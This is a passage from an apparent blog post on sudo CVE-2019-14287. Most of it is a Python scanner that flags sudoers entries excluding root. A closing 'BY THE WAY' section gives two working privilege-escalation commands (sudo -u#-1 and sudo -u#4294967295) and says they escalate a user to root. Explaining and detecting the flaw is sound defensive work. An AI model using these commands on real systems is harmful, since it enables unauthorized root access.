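The recommended review can be scripted. The following is an added example (not from this post or from the sudo project): it scans sudoers text for user specifications whose runas list excludes root by name, by UID (!#0) or through a Runas_Alias, the three forms shown above. The sample sudoers content is constructed; line continuations with a trailing backslash and #include directives are not handled and must be checked by hand.

```python
import re

RUNAS_SPEC_RE = re.compile(r"\(([^)]*)\)")
ROOT_FORMS = {"root", "#0"}

def parse_runas_aliases(sudoers_text: str) -> dict:
    """Collect 'Runas_Alias NAME = a, b' definitions into {NAME: [a, b]}."""
    aliases = {}
    for line in sudoers_text.splitlines():
        m = re.match(r"\s*Runas_Alias\s+(\w+)\s*=\s*(.+)", line)
        if m:
            aliases[m.group(1)] = [x.strip() for x in m.group(2).split(",")]
    return aliases

def runas_excludes_root(runas_spec: str, aliases: dict) -> bool:
    """True if a runas list such as 'ALL, !root' excludes root by name, by
    UID (!#0) or through a Runas_Alias that contains either form."""
    user_part = runas_spec.split(":", 1)[0]        # drop any ': group_list'
    for item in (x.strip() for x in user_part.split(",")):
        if not item.startswith("!"):
            continue
        target = item.lstrip("!").strip()
        if target in ROOT_FORMS:
            return True
        if any(t in ROOT_FORMS for t in aliases.get(target, [])):
            return True
    return False

def find_affected_entries(sudoers_text: str) -> list:
    """Return (line_number, line) for each user specification whose runas list
    excludes root, i.e. the shape CVE-2019-14287 applies to. Comment lines,
    Defaults lines and alias definitions are skipped."""
    aliases = parse_runas_aliases(sudoers_text)
    affected = []
    for number, line in enumerate(sudoers_text.splitlines(), start=1):
        stripped = line.strip()
        if (not stripped or stripped.startswith("#") or stripped.startswith("Defaults")
                or "_Alias" in stripped.split(None, 1)[0]):
            continue
        for spec in RUNAS_SPEC_RE.findall(line):
            if runas_excludes_root(spec, aliases):
                affected.append((number, stripped))
                break
    return affected

# Constructed sample, not a real /etc/sudoers; lines 5 to 7 are the three forms
# from the mitigation section, the other entries are unaffected shapes.
SAMPLE_SUDOERS = """\
# constructed sample sudoers
Defaults env_reset
Runas_Alias MYGROUP = root, adminuser
root ALL=(ALL:ALL) ALL
someuser ALL=(ALL, !root) /usr/bin/somecommand
someuser ALL=(ALL, !#0) /usr/bin/somecommand
someuser ALL=(ALL, !MYGROUP) /usr/bin/somecommand
bob ALL=(ALL, !alice) /usr/bin/somecommand
carol ALL=(www-data) /usr/bin/somecommand
"""

if __name__ == "__main__":
    for number, line in find_affected_entries(SAMPLE_SUDOERS):
        print(f"line {number}: {line}")
```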

BY THE WAY

If you have sudo access under such an entry, you can run the following commands to escalate yourself to root:
------------------------------------------------------------------------------------------- 
sudo -u#-1 id -u
-------------------------------------------------------------------------------------------
or
-------------------------------------------------------------------------------------------
sudo -u#4294967295 id -u
-------------------------------------------------------------------------------------------
The number 4294967295 is equivalent to 2^32 − 1, which is how -1 reads when interpreted as an unsigned 32-bit user ID.



References 
https://access.redhat.com/security/cve/cve-2019-14287
https://www.sudo.ws/alerts/minus_1_uid.html 
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14287
https://puppet.com/blog/find-and-fix-cve-2019-14287-sudo-vulnerability
https://www.youtube.com/watch?v=btUf1O7lQmY&t=184s